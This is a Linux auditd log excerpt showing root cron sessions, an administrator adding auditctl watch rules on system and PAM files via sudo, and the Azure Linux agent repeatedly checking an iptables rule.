+type=LOGIN msg=audit(1551487261.384:688): pid=19009 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=283 res=1
+type=USER_START msg=audit(1551487261.384:689): pid=19009 uid=0 auid=0 ses=283 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487261.388:690): pid=19009 uid=0 auid=0 ses=283 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487261.388:691): pid=19009 uid=0 auid=0 ses=283 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551487321.393:692): pid=19070 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487321.393:693): pid=19070 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487321.393:694): pid=19070 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=284 res=1
+type=USER_START msg=audit(1551487321.393:695): pid=19070 uid=0 auid=0 ses=284 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487321.393:696): pid=19070 uid=0 auid=0 ses=284 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487321.393:697): pid=19070 uid=0 auid=0 ses=284 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_ACCT msg=audit(1551487381.397:698): pid=19129 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:accounting acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_ACQ msg=audit(1551487381.397:699): pid=19129 uid=0 auid=4294967295 ses=4294967295 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=LOGIN msg=audit(1551487381.397:700): pid=19129 uid=0 subj==unconfined old-auid=4294967295 auid=0 tty=(none) old-ses=4294967295 ses=285 res=1
+type=USER_START msg=audit(1551487381.397:701): pid=19129 uid=0 auid=0 ses=285 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=CRED_DISP msg=audit(1551487381.401:702): pid=19129 uid=0 auid=0 ses=285 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_END msg=audit(1551487381.401:703): pid=19129 uid=0 auid=0 ses=285 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/sbin/cron" hostname=? addr=? terminal=cron res=success'
+type=USER_CMD msg=audit(1551487421.325:704): pid=19172 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D77202F62696E2F6B6D6F64202D702078202D6B206B65726E656C6D6F64756C6573 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487421.325:705): pid=19172 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487421.325:706): pid=19172 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487421.325:707):  auid=1000 ses=237 subj==unconfined op=add_rule key="kernelmodules" list=4 res=1
+type=USER_END msg=audit(1551487421.325:708): pid=19172 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487421.325:709): pid=19172 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551487421.333:710): pid=19175 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D77202F7661722F6C6F672F6175646974202D7020777861202D6B20617564697474616D706572696E67 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487421.333:711): pid=19175 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487421.333:712): pid=19175 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487421.353:713):  auid=1000 ses=237 subj==unconfined op=add_rule key="audittampering" list=4 res=1
+type=USER_END msg=audit(1551487421.353:714): pid=19175 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487421.353:715): pid=19175 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551487421.357:716): pid=19179 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D77202F6574632F6175646974202D7020777861202D6B20617564697474616D706572696E67 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487421.357:717): pid=19179 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487421.357:718): pid=19179 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487421.373:719):  auid=1000 ses=237 subj==unconfined op=add_rule key="audittampering" list=4 res=1
+type=USER_END msg=audit(1551487421.373:720): pid=19179 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487421.373:721): pid=19179 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551487421.377:722): pid=19182 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D77202F6574632F706173737764202D7020777861202D6B207573657267726F7570 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487421.377:723): pid=19182 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487421.377:724): pid=19182 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487421.381:725):  auid=1000 ses=237 subj==unconfined op=add_rule key="usergroup" list=4 res=1
+type=USER_END msg=audit(1551487421.381:726): pid=19182 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487421.381:727): pid=19182 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551487421.385:728): pid=19185 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D77202F6574632F67726F7570202D7020777861202D6B207573657267726F7570 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487421.385:729): pid=19185 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487421.385:730): pid=19185 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487421.385:731):  auid=1000 ses=237 subj==unconfined op=add_rule key="usergroup" list=4 res=1
+type=USER_END msg=audit(1551487421.389:732): pid=19185 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487421.389:733): pid=19185 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551487421.393:734): pid=19188 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D77202F6574632F70616D2E64202D7020777861202D6B2070616D terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487421.393:735): pid=19188 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487421.393:736): pid=19188 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487421.409:737):  auid=1000 ses=237 subj==unconfined op=add_rule key="pam" list=4 res=1
+type=USER_END msg=audit(1551487421.409:738): pid=19188 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487421.409:739): pid=19188 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551487421.413:740): pid=19191 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D6120616C776179732C65786974202D4620617263683D623332202D53206578656376652C6578656376656174 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487421.413:741): pid=19191 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487421.413:742): pid=19191 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487421.413:743):  auid=1000 ses=237 subj==unconfined op=add_rule key=(null) list=4 res=1
+type=USER_END msg=audit(1551487421.413:744): pid=19191 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487421.413:745): pid=19191 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_CMD msg=audit(1551487424.157:746): pid=19194 uid=1000 auid=1000 ses=237 subj==unconfined msg='cwd="/home/linuxserveradmin" cmd=617564697463746C202D6120616C776179732C65786974202D4620617263683D623634202D53206578656376652C6578656376656174 terminal=pts/0 res=success'
+type=CRED_REFR msg=audit(1551487424.157:747): pid=19194 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=USER_START msg=audit(1551487424.157:748): pid=19194 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_open acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CONFIG_CHANGE msg=audit(1551487424.157:749):  auid=1000 ses=237 subj==unconfined op=add_rule key=(null) list=4 res=1
+type=USER_END msg=audit(1551487424.157:750): pid=19194 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:session_close acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=CRED_DISP msg=audit(1551487424.157:751): pid=19194 uid=0 auid=1000 ses=237 subj==unconfined msg='op=PAM:setcred acct="root" exe="/usr/bin/sudo" hostname=? addr=? terminal=/dev/pts/0 res=success'
+type=SYSCALL msg=audit(1551487424.869:752): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0657a630 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19197 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487424.869:752): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487424.869:752): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487424.869:752): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487424.869:752): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487424.869:752): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487424.869:753): arch=c000003e syscall=59 success=yes exit=0 a0=5621fa7e0bb8 a1=5621fa7e0b70 a2=5621fa7e0b88 a3=7f5c23270810 items=2 ppid=19197 pid=19198 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487424.869:753): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487424.869:753): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487424.869:753): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487424.869:753): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487424.869:753): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487424.873:754): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0657a630 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19199 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487424.873:754): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487424.873:754): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487424.873:754): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487424.873:754): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487424.873:754): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487424.873:755): arch=c000003e syscall=59 success=yes exit=0 a0=55f2f3ed17e0 a1=55f2f3ed1728 a2=55f2f3ed17b0 a3=7f9d8d5dc810 items=2 ppid=19199 pid=19200 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487424.873:755): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487424.873:755): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487424.873:755): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487424.873:755): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487424.873:755): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487429.885:756): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662b7b0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19201 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487429.885:756): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487429.885:756): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487429.885:756): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487429.885:756): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487429.885:756): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487429.885:757): arch=c000003e syscall=59 success=yes exit=0 a0=5609e9678bb8 a1=5609e9678b70 a2=5609e9678b88 a3=7f207f31f810 items=2 ppid=19201 pid=19202 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487429.885:757): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487429.885:757): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487429.885:757): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487429.885:757): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487429.885:757): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487429.885:758): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0662b7b0 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19203 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487429.885:758): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487429.885:758): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487429.885:758): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487429.885:758): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487429.885:758): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487429.889:759): arch=c000003e syscall=59 success=yes exit=0 a0=55ff9caae7e0 a1=55ff9caae728 a2=55ff9caae7b0 a3=7f14a25e9810 items=2 ppid=19203 pid=19204 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487429.889:759): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487429.889:759): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487429.889:759): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487429.889:759): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487429.889:759): proctitle=69707461626C6573002D77002D74007365637572697479002D43004F5554505554002D64003136382E36332E3132392E3136002D7000746370002D6D00636F6E6E747261636B002D2D6374737461746500494E56414C49442C4E4557002D6A0044524F50
+type=SYSCALL msg=audit(1551487434.901:760): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685e470 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19205 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487434.901:760): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D2D76657273696F6E
+type=CWD msg=audit(1551487434.901:760): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487434.901:760): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487434.901:760): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487434.901:760): proctitle=2F62696E2F7368002D630069707461626C6573202D2D76657273696F6E
+type=SYSCALL msg=audit(1551487434.901:761): arch=c000003e syscall=59 success=yes exit=0 a0=5648d3fb9bb8 a1=5648d3fb9b70 a2=5648d3fb9b88 a3=7fe11d2c5810 items=2 ppid=19205 pid=19206 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487434.901:761): argc=2 a0="iptables" a1="--version"
+type=CWD msg=audit(1551487434.901:761): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487434.901:761): item=0 name="/sbin/iptables" inode=3951 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487434.901:761): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487434.901:761): proctitle=69707461626C6573002D2D76657273696F6E
+type=SYSCALL msg=audit(1551487434.901:762): arch=c000003e syscall=59 success=yes exit=0 a0=7fdd090dac18 a1=7fdd0685e470 a2=7ffec9cad0c0 a3=9 items=2 ppid=1305 pid=19207 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="sh" exe="/bin/dash" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487434.901:762): argc=3 a0="/bin/sh" a1="-c" a2=69707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=CWD msg=audit(1551487434.901:762): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
+type=PATH msg=audit(1551487434.901:762): item=0 name="/bin/sh" inode=27 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PATH msg=audit(1551487434.901:762): item=1 name="/lib64/ld-linux-x86-64.so.2" inode=2075 dev=08:01 mode=0100755 ouid=0 ogid=0 rdev=00:00 nametype=NORMAL cap_fp=0000000000000000 cap_fi=0000000000000000 cap_fe=0 cap_fver=0
+type=PROCTITLE msg=audit(1551487434.901:762): proctitle=2F62696E2F7368002D630069707461626C6573202D77202D74207365637572697479202D43204F5554505554202D64203136382E36332E3132392E3136202D7020746370202D6D20636F6E6E747261636B202D2D6374737461746520494E56414C49442C4E4557202D6A2044524F50
+type=SYSCALL msg=audit(1551487434.901:763): arch=c000003e syscall=59 success=yes exit=0 a0=5567dcc1a7e0 a1=5567dcc1a728 a2=5567dcc1a7b0 a3=7f8b43bb4810 items=2 ppid=19207 pid=19208 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm="iptables" exe="/sbin/xtables-multi" subj==unconfined key=(null)
+type=EXECVE msg=audit(1551487434.901:763): argc=16 a0="iptables" a1="-w" a2="-t" a3="security" a4="-C" a5="OUTPUT" a6="-d" a7="168.63.129.16" a8="-p" a9="tcp" a10="-m" a11="conntrack" a12="--ctstate" a13="INVALID,NEW" a14="-j" a15="DROP"
+type=CWD msg=audit(1551487434.901:763): cwd="/var/lib/waagent/WALinuxAgent-2.2.37"
